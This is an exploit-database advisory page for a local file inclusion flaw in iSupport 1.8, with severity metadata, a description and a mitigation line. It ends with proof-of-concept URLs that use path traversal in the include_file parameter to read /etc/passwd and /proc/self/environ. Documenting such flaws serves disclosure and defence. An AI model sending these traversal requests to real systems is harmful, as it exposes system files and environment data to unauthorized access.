header-logo
Suggest Exploit
vendor:
iSupport
by:
Unknown
5.5
CVSS
MEDIUM
Local File Inclusion
22
CWE
Product Name: iSupport
Affected Version From: 1.8
Affected Version To: 1.8
Patch Exists: NO
Related CWE:
CPE: a:isupport:isupport:1.8
Metasploit:
Other Scripts:
Platforms Tested:
2007

Local File Inclusion vulnerability in iSupport

iSupport is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized user to view files and execute local scripts.

Mitigation:

To mitigate this vulnerability, it is recommended to properly sanitize user-supplied input and implement access controls to prevent unauthorized access to sensitive files.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26961/info

iSupport is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

Exploiting this issue may allow an unauthorized user to view files and execute local scripts.

This issue affects iSupport 1.8; other versions may also be affected. 


http://www.example.com/iSupport/index.php?include_file=[local file]
http://www.example.com/helpdesk/index.php?include_file=../../../../../proc/self/environ
http://www.example.com/helpdesk/index.php?include_file=../../../../../etc/passwd